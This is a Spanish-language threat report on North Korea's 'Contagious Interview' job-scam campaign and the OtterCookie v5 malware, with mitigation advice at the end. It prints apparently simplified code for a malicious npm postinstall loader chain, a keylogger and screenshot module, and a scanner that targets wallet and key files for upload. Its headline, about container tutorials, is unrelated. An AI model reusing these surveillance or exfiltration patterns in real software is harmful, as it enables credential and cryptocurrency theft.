Código Facilito lanza los “Días de Contenedores”: una semana gratuita de tutoriales sobre Docker, Kubernetes y Cloud Native

Los actores de amenazas vinculados a Corea del Norte continúan refinando sus herramientas de ataque cibernético, llevando sus capacidades maliciosas a niveles sin precedentes. Investigadores de seguridad de Cisco Talos han identificado una evolución significativa en las tácticas del grupo conocido por la campaña "Contagious Interview", donde dos de sus principales herramientas de malware, BeaverTail y OtterCookie, están convergiendo en funcionalidad para crear un arsenal más potente y versátil.

Esta consolidación representa un cambio estratégico en el desarrollo de malware patrocinado por estados-nación, donde la eficiencia operativa y la integración de capacidades múltiples se convierten en prioridades clave. El grupo, rastreado bajo múltiples denominaciones por la comunidad de ciberseguridad, incluye nombres como CL-STA-0240, Famous Chollima, Gwisin Gang, DEV#POPPER, y UNC5342, entre otros.

El Ecosistema de Malware Norcoreano

BeaverTail: El Ladrón de Información Tradicional

BeaverTail ha sido históricamente la herramienta principal de robo de información del grupo, diseñada específicamente para infiltrarse en sistemas comprometidos y extraer datos sensibles. Sus capacidades incluyen la enumeración de perfiles de navegadores, extensiones instaladas, y la extracción de credenciales almacenadas. Además, funciona como un descargador que permite la instalación de payloads adicionales en sistemas infectados.

OtterCookie: El Ejecutor de Comandos Remotos

OtterCookie, observado por primera vez en ataques reales durante septiembre de 2024, complementa las capacidades de BeaverTail al proporcionar funcionalidad de comando y control. A diferencia de su contraparte, OtterCookie se especializa en establecer comunicación con servidores remotos para recibir y ejecutar comandos en hosts comprometidos, permitiendo a los atacantes mantener acceso persistente y control operativo sobre los sistemas infectados.

La Convergencia: OtterCookie v5

El análisis reciente revela que la versión más reciente de OtterCookie, denominada v5, ha incorporado funcionalidades que tradicionalmente pertenecían a BeaverTail, difuminando la distinción entre ambas herramientas. Esta nueva versión representa una plataforma modular completa que combina:

• Capacidades de robo de datos: Extracción de información de navegadores, billeteras de criptomonedas y archivos del sistema
• Ejecución remota de comandos: Comunicación bidireccional con servidores de comando y control para operaciones en tiempo real
• Monitoreo de actividad: Nuevos módulos de keylogging y captura de pantallas que registran todo lo que los usuarios escriben y visualizan
• Persistencia avanzada: Instalación de herramientas de acceso remoto legítimas como AnyDesk para mantener acceso a largo plazo
• Vigilancia del portapapeles: Monitoreo continuo del contenido copiado, especialmente útil para interceptar direcciones de billeteras de criptomonedas

La Campaña Contagious Interview: Ingeniería Social Sofisticada

El vector de ataque principal utilizado por estos actores de amenazas es una elaborada estafa de reclutamiento que comenzó a finales de 2022. Los operadores se hacen pasar por organizaciones legítimas en procesos de contratación, dirigiéndose específicamente a desarrolladores y profesionales de tecnología en búsqueda de empleo.

Metodología del Ataque

El esquema de ataque sigue un patrón predecible pero efectivo:

• Los atacantes se presentan como reclutadores o gerentes de contratación de empresas tecnológicas reconocidas
• Ofrecen oportunidades de empleo atractivas que requieren completar una "prueba técnica" o "desafío de programación"
• Proporcionan repositorios aparentemente legítimos en plataformas como Bitbucket con aplicaciones troyanizadas
• Las víctimas, creyendo participar en un proceso de selección genuino, descargan e instalan el software malicioso
• Una vez ejecutado, el malware establece persistencia y comienza la exfiltración de datos sensibles

Caso Reciente: Infección en Sri Lanka

Cisco Talos documentó un incidente reciente que involucró a una organización con sede en Sri Lanka. Aunque la empresa no fue específicamente seleccionada como objetivo, uno de sus sistemas fue comprometido después de que un empleado cayera en la trampa de una oferta de trabajo falsa.

Análisis del Payload: Chessfi

El software malicioso, disfrazado como una aplicación Node.js llamada "Chessfi", fue alojado en Bitbucket y presentado como parte de un proceso de entrevista técnica. La aplicación incluía una dependencia oculta a través de un paquete llamado "node-nvm-ssh", que fue publicado en el repositorio oficial de npm el 20 de agosto de 2025 por un usuario identificado como "trailer".

Antes de ser eliminado por los mantenedores de npm seis días después de su publicación, el paquete malicioso acumuló 306 descargas. Este paquete formaba parte de un conjunto más amplio de 338 bibliotecas Node.js maliciosas identificadas como conectadas a la campaña Contagious Interview.

Cadena de Ejecución del Malware

El mecanismo de infección sigue una cadena de ejecución multi-etapa diseñada para evadir detección:

// package.json - Hook de postinstalación
{
  "name": "node-nvm-ssh",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node skip"
  }
}

// skip.js - Script inicial que carga el payload principal
const fs = require('fs');
const path = require('path');

function loadNextStage() {
  const indexPath = path.join(__dirname, 'index.js');
  require(indexPath);
}

loadNextStage();

// index.js - Cargador del payload final
const malwareLoader = require('./file15.js');
malwareLoader.initialize();

Módulos Avanzados de OtterCookie v5

Módulo de Keylogging y Captura de Pantallas

Una de las adiciones más significativas en esta nueva versión es el módulo de registro de pulsaciones de teclado y captura de pantallas. Este componente utiliza paquetes npm legítimos para implementar su funcionalidad:

// Implementación del keylogger usando node-global-key-listener
const GlobalKeyListener = require('node-global-key-listener').GlobalKeyListener;
const screenshot = require('screenshot-desktop');
const https = require('https');

class SurveillanceModule {
  constructor(c2Server) {
    this.c2Server = c2Server;
    this.keyLogger = new GlobalKeyListener();
    this.keystrokeBuffer = [];
  }

  initializeKeylogging() {
    this.keyLogger.addListener((e, down) => {
      if (e.state === "DOWN") {
        this.keystrokeBuffer.push({
          key: e.name,
          timestamp: Date.now()
        });
        
        if (this.keystrokeBuffer.length >= 50) {
          this.exfiltrateKeystrokes();
        }
      }
    });
  }

  async captureScreenshot() {
    try {
      const imgBuffer = await screenshot();
      this.sendToC2(imgBuffer, 'screenshot');
    } catch (error) {
      console.error('Screenshot failed:', error);
    }
  }

  exfiltrateKeystrokes() {
    const data = JSON.stringify(this.keystrokeBuffer);
    this.sendToC2(data, 'keystrokes');
    this.keystrokeBuffer = [];
  }
}

Módulo de Shell Remoto

El módulo de shell remoto proporciona capacidades de ejecución de comandos en tiempo real, utilizando Socket.IO para establecer una conexión bidireccional persistente con el servidor de comando y control:

• Envía información del sistema y contenido del portapapeles al servidor C2
• Instala el paquete npm "socket.io-client" para conectarse a un puerto específico en el servidor OtterCookie
• Recibe y ejecuta comandos arbitrarios del sistema operativo
• Mantiene conexión persistente para operaciones continuas

Módulo de Carga de Archivos

Este componente realiza un escaneo exhaustivo del sistema de archivos en busca de datos valiosos:

// Módulo de búsqueda y exfiltración de archivos
const fs = require('fs');
const path = require('path');
const os = require('os');

class FileExfiltrationModule {
  constructor() {
    this.targetExtensions = [
      '.txt', '.doc', '.docx', '.pdf', '.key', 
      '.pem', '.wallet', '.dat'
    ];
    this.targetKeywords = [
      'metamask', 'bitcoin', 'backup', 'phrase',
      'seed', 'wallet', 'private', 'password'
    ];
  }

  scanAllDrives() {
    const drives = this.enumerateDrives();
    drives.forEach(drive => {
      this.traverseDirectory(drive);
    });
  }

  traverseDirectory(dirPath) {
    try {
      const entries = fs.readdirSync(dirPath, { withFileTypes: true });
      
      entries.forEach(entry => {
        const fullPath = path.join(dirPath, entry.name);
        
        if (entry.isDirectory()) {
          this.traverseDirectory(fullPath);
        } else if (this.isTargetFile(entry.name)) {
          this.uploadToC2(fullPath);
        }
      });
    } catch (error) {
      // Omitir directorios sin acceso
    }
  }

  isTargetFile(filename) {
    const hasTargetExtension = this.targetExtensions.some(ext => 
      filename.toLowerCase().endsWith(ext)
    );
    const hasTargetKeyword = this.targetKeywords.some(keyword => 
      filename.toLowerCase().includes(keyword)
    );
    return hasTargetExtension || hasTargetKeyword;
  }
}

Módulo de Robo de Extensiones de Criptomonedas

Este módulo se especializa en extraer datos de extensiones de billeteras de criptomonedas instaladas en navegadores Google Chrome y Brave. La lista de extensiones objetivo incluye las billeteras más populares y presenta una superposición parcial con las extensiones atacadas por BeaverTail, evidenciando la convergencia funcional entre ambas herramientas.

Innovaciones en Técnicas de Evasión

EtherHiding: Blockchain como Infraestructura C2

Una de las innovaciones más significativas reveladas por Google Threat Intelligence Group (GTIG) y Mandiant es el uso de una técnica llamada "EtherHiding". Este método representa el primer caso documentado de un actor patrocinado por un estado-nación que utiliza infraestructura blockchain como servidor de comando y control.

La técnica funciona almacenando payloads de etapa siguiente en contratos inteligentes desplegados en BNB Smart Chain (BSC) o en la blockchain de Ethereum. Esta aproximación ofrece múltiples ventajas para los atacantes:

• Descentralización: No hay un servidor central que pueda ser decomisado o bloqueado
• Persistencia: Los datos en blockchain son inmutables y permanentemente accesibles
• Anonimato: Las transacciones en blockchain pueden realizarse de forma pseudónima
• Legitimidad aparente: El tráfico hacia blockchain puede confundirse con actividad financiera legítima
• Resiliencia: La infraestructura blockchain es altamente resistente a censura y caídas

Experimentación con Nuevos Vectores de Entrega

Los investigadores de Talos también identificaron evidencia de que el grupo está experimentando con métodos adicionales de distribución de malware. Se descubrieron artefactos basados en Qt de BeaverTail y una extensión maliciosa de Visual Studio Code que contenía código tanto de BeaverTail como de OtterCookie.

Extensión Maliciosa de VS Code

La presencia de una extensión comprometida de Visual Studio Code representa un vector de ataque particularmente preocupante, ya que:

• Los desarrolladores confían en sus herramientas de desarrollo y pueden tener menor precaución al instalar extensiones
• VS Code tiene acceso completo al sistema de archivos y permisos elevados en muchos entornos de desarrollo
• Las extensiones pueden ejecutar código arbitrario con los privilegios del usuario
• El marketplace de extensiones es un ecosistema confiable que puede ser explotado para distribución masiva

Sin embargo, los investigadores señalan que existe la posibilidad de que esta extensión pueda ser resultado de experimentación de otro actor no asociado con Famous Chollima, o incluso de un investigador de seguridad, ya que se desvía de las tácticas, técnicas y procedimientos (TTPs) habituales del grupo.

Implicaciones para la Seguridad Global

Evolución Continua de Amenazas Patrocinadas por Estados

La convergencia de BeaverTail y OtterCookie en una plataforma unificada ilustra cómo los actores de amenazas patrocinados por estados continúan innovando y adaptándose. Esta tendencia hacia herramientas modulares y multifuncionales refleja un enfoque más eficiente en el desarrollo de malware, donde un único payload puede cumplir múltiples objetivos operativos.

Riesgos para la Industria de Criptomonedas

El enfoque persistente en billeteras y extensiones de criptomonedas subraya la motivación financiera detrás de estas campañas. Corea del Norte ha sido vinculada repetidamente a robos masivos de criptomonedas destinados a financiar su programa nuclear y evadir sanciones internacionales.

Amenaza a Profesionales de Tecnología

La sofisticación de la campaña Contagious Interview representa una amenaza particular para desarrolladores, ingenieros de software y profesionales de tecnología que buscan activamente nuevas oportunidades laborales. La combinación de ingeniería social convincente con infraestructura técnica aparentemente legítima hace que estos ataques sean particularmente difíciles de detectar.

Recomendaciones de Mitigación

Para Organizaciones

• Verificación rigurosa: Implementar procesos de verificación estrictos para cualquier software instalado por empleados, especialmente herramientas relacionadas con entrevistas técnicas
• Monitoreo de dependencias: Utilizar herramientas de análisis de seguridad de cadena de suministro de software para detectar paquetes npm, PyPI o RubyGems maliciosos
• Segmentación de red: Aislar estaciones de trabajo de desarrollo del resto de la red corporativa
• EDR y XDR: Implementar soluciones de Endpoint Detection and Response con capacidades de análisis de comportamiento
• Concientización continua: Capacitar a los empleados sobre las técnicas actuales de ingeniería social y esquemas de reclutamiento falsos

Para Desarrolladores Individuales

• Desconfiar de ofertas de trabajo que requieren la instalación de software personalizado o no estándar
• Verificar la legitimidad de las empresas reclutadoras a través de múltiples canales independientes
• Ejecutar código de pruebas técnicas en entornos sandbox o máquinas virtuales aisladas
• Revisar cuidadosamente las dependencias de paquetes npm antes de la instalación
• Mantener sistemas actualizados con los últimos parches de seguridad
• Utilizar soluciones de seguridad endpoint en dispositivos personales y de trabajo

Conclusión

La fusión de capacidades entre BeaverTail y OtterCookie marca una nueva fase en la evolución de las operaciones cibernéticas patrocinadas por Corea del Norte. La integración de funcionalidades avanzadas de keylogging, captura de pantallas, y monitoreo del portapapeles con capacidades tradicionales de robo de información y ejecución remota de comandos crea una plataforma de malware excepcionalmente potente y versátil.

La innovación adicional de utilizar blockchain como infraestructura de comando y control demuestra que estos actores de amenazas están a la vanguardia de la adopción de nuevas tecnologías para propósitos maliciosos. Esta técnica, anteriormente asociada solo con grupos de cibercriminalidad, ahora forma parte del arsenal de actores patrocinados por estados-nación.

A medida que estas amenazas continúan evolucionando, la comunidad de seguridad cibernética debe mantenerse vigilante y adaptarse rápidamente. La sofisticación de la campaña Contagious Interview subraya la importancia de la educación en seguridad, especialmente para profesionales de tecnología que son objetivos prioritarios. Solo mediante una combinación de controles técnicos robustos, procedimientos organizacionales estrictos y concientización continua podremos mitigar efectivamente estas amenazas persistentes avanzadas.

La investigación continua de empresas como Cisco Talos, Google Threat Intelligence Group y Mandiant es fundamental para comprender y contrarrestar estas operaciones cibernéticas cada vez más sofisticadas. La colaboración entre el sector privado, gobiernos y la comunidad de investigación en seguridad será esencial para proteger la infraestructura digital global contra estos actores de amenazas bien financiados y altamente capacitados.